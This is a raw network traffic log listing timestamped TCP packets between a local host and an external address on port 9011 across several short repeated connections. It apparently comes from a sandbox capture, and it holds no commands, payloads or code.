Jun 14, 2024 16:42:02.673598051 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:02.678617001 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:02.697135925 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:02.702544928 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:02.713835955 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:02.719014883 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:02.780525923 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:02.786097050 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:02.819674015 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:02.827162981 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:02.883018017 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:02.887881994 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:02.911581993 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:02.916579008 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:02.965851068 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:02.971601963 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.009763956 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.016551018 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.056889057 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.062495947 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.091834068 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.096667051 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.121434927 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.126386881 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.142399073 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.147413015 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.165587902 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.172533035 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.202519894 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.208565950 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.244015932 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.249366999 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.307120085 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.312988043 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.315551043 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.320550919 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.329967976 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.338989019 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.346832037 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:03.347114086 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.347114086 CEST	52074	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:03.354943037 CEST	9011	52074	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.397016048 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.402018070 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.402124882 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.403117895 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.408865929 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.438127041 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.444075108 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.450298071 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.455111980 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.470000982 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.474920034 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.500248909 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.505098104 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.523310900 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.528084040 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.536235094 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.540971994 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.554822922 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.559643030 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.580257893 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.585232019 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.625737906 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.630539894 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.645602942 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.650409937 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.660819054 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.665626049 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.703584909 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.708848000 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.719645977 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.724509954 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.739974976 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.744889021 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.772542953 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.777461052 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.821037054 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.826136112 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.864111900 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.868910074 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.895354986 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.900141954 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.923943043 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.928693056 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:08.970060110 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:08.974864006 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:09.014683962 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:09.019845009 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:09.048578978 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:09.053447008 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:09.062098980 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:09.066981077 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:09.103141069 CEST	9011	52075	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:09.103199959 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:09.140700102 CEST	52075	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.139245987 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.144089937 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.144160986 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.144943953 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.149765968 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.171933889 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.176708937 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.211997032 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.216955900 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.254194021 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.259476900 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.299453020 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.304801941 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.363487005 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.369570017 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.400475025 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.405728102 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.437979937 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.444397926 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.524116993 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.529195070 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.555758953 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.560700893 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.578347921 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.583161116 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.599236965 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.604043007 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.647902012 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.652827978 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.716197014 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.721055031 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.835448027 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.840555906 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.864598989 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:14.864692926 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.864794016 CEST	52076	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:14.869734049 CEST	9011	52076	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:19.882725954 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:19.889705896 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:19.889786959 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:19.890623093 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:19.895474911 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:19.916893005 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:19.922770023 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:19.960587025 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:19.965533972 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:19.973292112 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:19.978065968 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:19.989648104 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:19.994541883 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.025298119 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.032927990 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.065220118 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.072892904 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.084069967 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.089478970 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.122657061 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.127672911 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.162131071 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.167033911 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.187217951 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.192214966 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.223423958 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.229403019 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.271270037 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.277035952 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.306365967 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.312060118 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.344703913 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.352283955 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.357677937 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.364106894 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.382337093 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.387391090 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.402369976 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.407253027 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.420901060 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.425663948 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.451375008 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.456413984 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.467195034 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.473074913 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.507491112 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.512509108 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.516030073 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.522005081 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.575767040 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.580543041 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.602236986 CEST	9011	52077	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:20.602442980 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:20.606127024 CEST	52077	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.617481947 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.622409105 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.622489929 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.623114109 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.628036976 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.633816004 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.638765097 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.697846889 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.703062057 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.714045048 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.718981981 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.744489908 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.749403000 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.777101994 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.781996012 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.802268982 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.807183027 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.830230951 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.835751057 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.855676889 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.860574961 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.873202085 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.878034115 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.894627094 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.899511099 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.926588058 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.931554079 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.942871094 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.947691917 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.957839012 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.962611914 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:25.975181103 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:25.980057001 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.001185894 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.006351948 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.023045063 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.028135061 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.035280943 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.040077925 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.098603010 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.103733063 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.119599104 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.125099897 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.157919884 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.162864923 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.181186914 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.186147928 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.196373940 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.201606989 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.220870018 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.226064920 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.249222994 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.254939079 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.283559084 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.288911104 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.315412045 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.320825100 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.320867062 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.320929050 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.321152925 CEST	52078	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:26.325809002 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:26.325895071 CEST	9011	52078	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.397780895 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.402843952 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.402925014 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.403475046 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.409151077 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.417669058 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.422457933 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.455868959 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.461925983 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.472501993 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.477457047 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.491494894 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.496720076 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.506623983 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.511455059 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.522155046 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.526997089 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.544965982 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.550569057 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.583502054 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.588440895 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.644330978 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.649280071 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.684544086 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.689487934 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.722528934 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.727392912 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.757782936 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.762752056 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.779705048 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.784753084 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.808073044 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.812952995 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.846163988 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.850936890 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.865024090 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.870064974 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.896621943 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.901454926 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.907932997 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.913144112 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.923635960 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.928476095 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.951805115 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.956687927 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.988176107 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:31.993292093 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:31.999095917 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:32.016941071 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:32.021270037 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:32.026407003 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:32.048765898 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:32.053786993 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:32.069461107 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:32.074461937 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:32.088190079 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:32.088260889 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:32.088510036 CEST	52079	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:32.093255997 CEST	9011	52079	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.154695988 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.159548998 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.159631014 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.160160065 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.164910078 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.178824902 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.184521914 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.208446026 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.213206053 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.230593920 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.236289024 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.269623041 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.274430990 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.303775072 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.309709072 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.346563101 CEST	52080	9011	192.168.2.5	218.244.58.70
Jun 14, 2024 16:42:37.351443052 CEST	9011	52080	218.244.58.70	192.168.2.5
Jun 14, 2024 16:42:37.364516020 CEST	52080	9011	192.168.2.5	218.244.58.70
